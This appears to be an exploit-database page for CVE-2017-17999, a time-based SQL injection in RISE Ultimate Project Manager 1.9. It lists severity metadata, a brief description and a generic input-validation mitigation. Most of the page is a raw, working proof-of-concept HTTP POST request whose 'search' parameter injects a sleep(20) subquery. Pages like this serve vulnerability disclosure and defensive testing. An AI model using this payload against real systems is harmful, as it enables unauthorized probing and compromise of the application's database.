header-logo
Suggest Exploit
vendor:
RISE Ultimate Project Manager
by:
Ahmad Mahfouz
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: RISE Ultimate Project Manager
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: NO
Related CWE: CVE-2017-17999
CPE: a:fairsketch:rise_ultimate_project_manager:1.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2017

RISE Ultimate Project Manager 1.9 – SQL Injection

RISE Ultimate Project Manager version 1.9 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a malicious payload to the application via the 'search' parameter in the POST request. This payload will cause the application to sleep for 20 seconds, indicating a successful exploitation of the vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection
# Exploit Author: Ahmad Mahfouz 
# Contact: http://twitter.com/eln1x
# Date: 30/12/2017
# CVE: CVE-2017-17999
# Vendor Homepage: http://fairsketch.com/
# Version: 1.9

 

 

POST /index.php/knowledge_base/get_article_suggestion/ HTTP/1.1
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close

 
search=product'%20and%20(select*from(select(sleep(20)))a)--%20